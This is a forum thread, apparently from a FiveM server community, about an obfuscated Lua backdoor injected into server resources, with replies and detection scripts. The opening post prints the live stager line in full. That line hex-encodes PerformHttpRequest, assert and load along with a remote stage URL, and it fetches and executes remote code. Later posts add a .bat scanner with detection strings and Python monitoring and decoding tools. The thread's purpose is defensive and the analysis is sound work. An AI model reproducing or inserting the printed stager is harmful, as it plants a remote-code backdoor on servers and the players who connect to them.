A weird Line gets added to some resources

The line I find in many resources, like mapmanager_server.lua:

local MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[4][MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x61\x72\x62\x61\x6e\x69\x75\x73\x2e\x63\x6f\x6d\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x43\x63\x6f\x4d\x4d", function (mlGYqdBLSGsGhUrkYhUAgFEmMbrEUDYofeHoDYJtUhBIpZmmRfkxKOljoTNFxmuTYiyGlo, bBXKXMFxhaJtZZugAYAbXwjzOgXjUmqbfyuvnpsbnljOhJuieKBrpNgyhyEoGmYKCpzApm) if (bBXKXMFxhaJtZZugAYAbXwjzOgXjUmqbfyuvnpsbnljOhJuieKBrpNgyhyEoGmYKCpzApm == MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[6] or bBXKXMFxhaJtZZugAYAbXwjzOgXjUmqbfyuvnpsbnljOhJuieKBrpNgyhyEoGmYKCpzApm == MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[5]) then return end MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[4][MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[2]](MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[4][MccmYsQtoEhbQWasIWsroJeCtDFUqBpkXvNMmYqKpXnQsUhQsSqZLfeJVjnYuagnhSWzeF[3]](bBXKXMFxhaJtZZugAYAbXwjzOgXjUmqbfyuvnpsbnljOhJuieKBrpNgyhyEoGmYKCpzApm))() end)

Some of the affected resources:

[cfx-default]\[managers]\mapmanager\mapmanager_server.lua
[cfx-default]\[system]\hardcap\server.lua
[standalone]\illenium-appearance\server\database\database.lua
[standalone]\illenium-appearance\server\database\playeroutfitcodes.lua
[standalone]\illenium-appearance\server\database\playerskins.lua
[standalone]\illenium-appearance\server\framework\esx\callbacks.lua

I tried to delete that line from all resources but it comes back,
and I found that there is an exe file that gets created in the root of my server called subafivem.exe

EDIT

I found that it edits some server- and client-side files to add an obfuscated line that fetches data from a website.
For the solution I used so far, check
anti-RAT/Malware - Pastebin.com
I’ll update this post when I get more info.

1 Like

That’s making me nervous… you’re the second person to bring this up…

Possible malware attacks?
What resources are you running?

This is definitely malware; the \x72 and so forth is hex.
Translating it, you get:

“PerformHttpRequest” “assertload”
and a website
[Edit, was gonna post it, but it’s not a good idea to post it - Run the translations yourself if you’re really curious but PLEASE PLEASE DO NOT VISIT IT!] - Take it to a professional reverser to get it looked at OR save your important resources and backup restore your box…

They’ve already likely gotten on your machine a few OTHER different ways and are using this to maintain a continuous connection. Take it offline and figure out what to do with it next…

These kinds of problems are usually caused by using malicious resources. Mostly these are obfuscated resources and can very often be found in leaked resources or even bought from shady sites (e.g. not Tebex).

In general terms:
Only download stuff you actually know is not malicious. E.g. the stuff in this forum should be free of such issues.

There are two ways to solve this:

  1. Delete recently added resources and remove the code in every single resource and hope that it doesn’t come back.
  2. Start the server from scratch and don’t use code from untrusted sources.
2 Likes

What I see atm: it’s a code line that downloads malware, a FiveM cheat that permits someone to control your server and your database… and more… Not completely sure for now, but it’s the best info I have for now. It looks like a RAT.

If you use the txAdmin preset installation, some look to be infected by this weird code.

I traced it with a VM and I found that it’s a cipher panel malware. I blocked the IPs, and I’m willing to post the IPs here to help anyone who has the same problem as mine. I’m still investigating to find the exact resource.

1 Like

Awesome work! Did you ever find out which resource was responsible?

What are the IP addresses?

I changed the resources folder to read-only because I had some trouble checking which resource is responsible, and I wrote a NodeJS script that keeps watching the files and logs it whenever a file gets edited. So far so good, no weird appends. If you need the code I can share it. Something weird: it adds a line to the fxmanifest file, server_scripts {'@mysql-async/lib/MySQL.lua'}. I know it’s a normal dependency, but it adds it to fxmanifest files even if it already exists there; idk what its purpose is.

1 Like
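The poster above describes watching the resources folder and logging every edit. As an added example (not the poster's NodeJS watcher, and not part of the original thread), here is a small polling file-integrity monitor in Python: it records a SHA-256 baseline of every script under a directory and reports files that were modified, added or removed since the last poll. The directory name, the watched suffixes and the polling interval are assumptions.

```python
# Added example: polling file-integrity monitor for a FiveM resources directory.
# Not the thread's NodeJS watcher; paths, suffixes and interval are assumptions.
import hashlib
import os
import sys
import time

# Script files an attacker would have to touch to re-insert a stager
# (assumption: .lua covers fxmanifest.lua and server/client scripts, .js covers JS resources).
WATCHED_SUFFIXES = (".lua", ".js")


def snapshot(root):
    """Return {relative_path: sha256_hex} for every watched file below root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(WATCHED_SUFFIXES):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            result[os.path.relpath(full, root)] = digest
    return result


def diff_snapshots(before, after):
    """Return (modified, added, removed) relative paths between two snapshots."""
    modified = sorted(p for p in before if p in after and before[p] != after[p])
    added = sorted(p for p in after if p not in before)
    removed = sorted(p for p in before if p not in after)
    return modified, added, removed


def watch(root, interval=5.0, rounds=None):
    """Poll root every `interval` seconds and print each change; rounds=None runs forever."""
    baseline = snapshot(root)
    print(f"[monitor] baseline: {len(baseline)} files under {root}")
    done = 0
    while rounds is None or done < rounds:
        time.sleep(interval)
        current = snapshot(root)
        modified, added, removed = diff_snapshots(baseline, current)
        stamp = time.strftime("%Y-%m-%d %H:%M:%S")
        for p in modified:
            print(f"[{stamp}] MODIFIED {p}")
        for p in added:
            print(f"[{stamp}] ADDED    {p}")
        for p in removed:
            print(f"[{stamp}] REMOVED  {p}")
        baseline = current  # report each change once, then track from the new state
        done += 1


if __name__ == "__main__":
    # Usage: python monitor.py /path/to/resources
    watch(sys.argv[1] if len(sys.argv) > 1 else "resources")
```

Because it hashes the files rather than relying on timestamps, an edit that preserves the modification time is still reported; the fxmanifest.lua append mentioned above would show up as a MODIFIED line for that file.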

Check the pastebin file I provided; it has all the extra info.

Was just wondering - Check this file:

I think it may help!

Can it do something on people’s PCs, or is that only a backdoor for the VPS?

It absolutely can.
This malware makes file changes to the filesystem in the FiveM directory. It allows an attacker to have write privileges on your server.

The scary thing about this is the idea that FiveM client scripts DOWNLOAD from the server on server join.
This means, if the bad guy wanted to target a list of players, it’s no harder than adding an additional resource that’s malicious…

It also has some command and control abilities. Think of it as an ‘evil ping’ the bad guys can use to make sure they can still ‘talk to’ your machine… at the drop of a hat, they can control it.

More on C&C / C2 here:

But there should be a way to not let that happen?

I think this was due to a script which was gotten off of a website that wasn’t this one / tebex.

They tell us not to download scripts from 3rd parties and you’ll be ‘safe’ but I’d rather give this advice:

Understand your scripts. If you’re going to download it (even if it’s from fivem’s forums / tebex), make sure you 100% know what it’s doing. If you’re even 1% unsure, you run the risk of something like this happening. Be smart about the lua you download…

If you’re unsure about what it is, don’t run it…ask about it…ask around, ask as many times as it takes for you to be comfortable enough to explain it to someone else. And that’s every corner of the code you download.

Follow that rule and you’ll never have to worry about getting infected by a script you run…

I have deleted all lines that look like this 6f\x72\x6d\x48\x74\x74\x70\x52\x65\x7 and I have also deleted SubAFiveM.exe.

That’s not going to remove the malware.

Especially if it’s staged. If it’s staged, it uses multiple ‘checkpoints’ (if you will) to establish a lasting connection on your machine. This is just one of them. You’ll need to dig deeper to understand what it’s doing.

Maybe try checking out the github:

But remember, if they’re already on your machine, it’s unknown what they have access to.
The most certain thing you can do is a backup restore to an earlier point.

If you don’t take regular backups, you’ll need to try to figure out how to undo what was done, which will require log-reading / reading the github

Otherwise…the last resort (the most certain, but also the most drastic) is a system wipe. Save the important files if you’re going this route, but make SURE they’re not malicious either…

I have scanned with windows defender and malwarebytes and no virus was found and I have also looked into many files for this github you sent for this piece of code and this code was not found on my pc in any file.

You can use this .bat file to check your resources (put it in /resources).
It’s a simple script that worked for me, so it might help you.

@echo off
setlocal
set malwarefound=0
echo You must put this in your resources directory!
echo [MalScanner] Welcome. Press enter to begin scanning.
pause
rem Each check searches every .lua file below this directory (/s) and prints
rem only the matching file names (/m). findstr returns errorlevel 0 on a match.
rem /l /c: makes the search string literal, so backslashes (as in the \x..
rem hex escapes) and parentheses are matched as typed, not read as regex syntax.
echo [MalScanner] Malware A checked
findstr /s /m /l /c:"random_char" *.lua
if %errorlevel%==0 set malwarefound=1
echo ------------------------------------
echo [MalScanner] Malware B checked
findstr /s /m /l /c:"Enchanced_Tabs" *.lua
if %errorlevel%==0 set malwarefound=1
echo ------------------------------------
echo [MalScanner] Malware C checked
findstr /s /m /l /c:"helpCode" *.lua
if %errorlevel%==0 set malwarefound=1
echo ------------------------------------
echo [MalScanner] Malware D checked -- may be found in certain Cfx default resources, is a false positive
findstr /s /m /l /c:"assert(load(" *.lua
if %errorlevel%==0 set malwarefound=1
echo ------------------------------------
rem Hex-escaped "PerformHttpRequest", the first string of the stager line above
echo [MalScanner] Malware E checked
findstr /s /m /l /c:"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74" *.lua
if %errorlevel%==0 set malwarefound=1
echo ------------------------------------
echo [MalScanner] Malware F checked
findstr /s /m /l /c:"helperServer" *.lua
if %errorlevel%==0 set malwarefound=1
echo ------------------------------------
echo [MalScanner] Malware G checked
findstr /s /m /l /c:"eGlAnDJByGaVAuyZDaXRzNwsCziWWqkhxierAdUuVyguVhqKsulbKUHiETOTsQTNuVsoCG" *.lua
if %errorlevel%==0 set malwarefound=1
echo ------------------------------------
if %malwarefound%==1 (
echo [MalScanner] Malware found! Check the above logged bad resource files. They contain malicious code. Use source comparison to remove it.
) else (
echo [MalScanner] No malware found.
)

pause
endlocal

1 Like
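The reply above that translated the hex escapes by hand, and the .bat scanner just posted, both come down to the same check: decode the `\xNN` string escapes and see whether a script builds an HTTP-request call next to a dynamic code loader. As an added example (my own code, not the thread's scanner and not from any FiveM project), the Python below does that decoding automatically, reports which decoded literals name `PerformHttpRequest` or `load`/`loadstring`, lists any decoded URLs, and walks a resources directory for such files. The sample Lua it scans is constructed for the demo, and the stage URL inside it is a placeholder, not the real one from the thread.

```python
# Added example: decode \xNN-escaped Lua string literals and flag scripts that
# pair an HTTP request with a dynamic code loader. Sample input is constructed;
# the URL in it is a placeholder. Not the thread's .bat scanner.
import os
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# A double-quoted Lua string literal, allowing escaped characters inside it.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
HTTP_FUNCS = {"PerformHttpRequest"}
LOADERS = {"load", "loadstring"}


def decode_escapes(s):
    """Replace every \\xNN escape in s with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def analyze(source):
    """Inspect one Lua source text and return what the decoded literals reveal."""
    findings = {"http": set(), "loader": set(), "urls": [], "hex_literals": 0}
    for m in STRING_LITERAL.finditer(source):
        raw = m.group(1)
        text = decode_escapes(raw)
        if HEX_ESCAPE.search(raw):
            findings["hex_literals"] += 1  # obfuscated literal, worth a look on its own
        if text in HTTP_FUNCS:
            findings["http"].add(text)  # e.g. _G["PerformHttpRequest"] built from hex
        if text in LOADERS:
            findings["loader"].add(text)  # e.g. _G["load"] built from hex
        if text.startswith(("http://", "https://")):
            findings["urls"].append(text)
    # Plain-text forms too: PerformHttpRequest(...) and assert(load(...)) written openly.
    for name in HTTP_FUNCS:
        if name in source:
            findings["http"].add(name)
    findings["loader"] |= set(re.findall(r"\b(load|loadstring)\s*\(", source))
    # A request whose body is handed to a loader is the stager shape from the thread;
    # either half alone (a version check, a config loader) is a normal thing to see.
    findings["suspicious"] = bool(findings["http"] and findings["loader"])
    return findings


def scan_directory(root):
    """Walk root and return {relative_path: findings} for every suspicious .lua file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".lua"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                result = analyze(fh.read())
            if result["suspicious"]:
                hits[os.path.relpath(full, root)] = result
    return hits


def hex_escape(s):
    """Encode s as \\xNN escapes; used only to build the constructed sample below."""
    return "".join(f"\\x{ord(c):02x}" for c in s)


# Constructed sample mirroring the stager's shape; placeholder URL, not the real one.
SAMPLE_STAGER = (
    'local t = {"%s","%s","%s",_G,"",nil} '
    't[4][t[1]]("%s", function(code, body) if body == t[6] or body == t[5] then return end '
    't[4][t[2]](t[4][t[3]](body))() end)'
) % (hex_escape("PerformHttpRequest"), hex_escape("assert"), hex_escape("load"),
     hex_escape("https://stage.example.invalid/stage3.php"))

# Constructed benign sample: an HTTP call that only prints the response.
SAMPLE_CLEAN = ('PerformHttpRequest("https://api.example.invalid/version", '
                'function(code, body) print(body) end)')


if __name__ == "__main__":
    for label, src in (("stager", SAMPLE_STAGER), ("clean", SAMPLE_CLEAN)):
        print(label, analyze(src))
    # Usage against a real tree: scan_directory("/path/to/resources")
```

Running it on the two samples marks the stager as suspicious (hex-built `PerformHttpRequest` and `load`, one decoded URL) and the plain version check as not suspicious, which is the distinction the .bat file's "Malware D" check cannot make on its own.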